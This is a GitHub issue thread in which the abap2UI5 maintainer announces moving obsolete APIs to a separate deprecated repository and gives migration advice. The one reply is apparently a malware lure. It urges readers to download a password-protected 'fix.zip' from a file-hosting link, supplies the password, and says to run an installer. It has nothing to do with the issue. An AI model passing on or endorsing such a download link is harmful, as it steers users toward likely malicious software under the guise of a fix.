### ISSUE TITLE
obsolete folder now in separated repository: abap2UI5-deprecated

### ISSUE THREAD

**Issue by oblomov-dev** [abap2UI5/abap2UI5#1335]
moved the package 02_00 (obsolete) to the new deprecated repository:
https://github.com/abap2UI5/abap2UI5-deprecated

All obsolete APIs can be collected there in the future.

Install the abap2UI5 repository+abap2UI5-deprecated and everything will work as before.

If the layout tables are already in use, before pulling the deprecated repository, better change the package assignment of the tables manually to make sure that the table content gets not deleted.

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
